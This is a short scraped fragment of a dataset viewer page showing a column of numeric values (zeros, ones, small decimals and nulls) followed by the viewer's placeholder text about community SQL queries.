| 0
| 0
| 0.004464
| 0
| null | null | 0
| 0.013393
| null | null | 0.049107
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.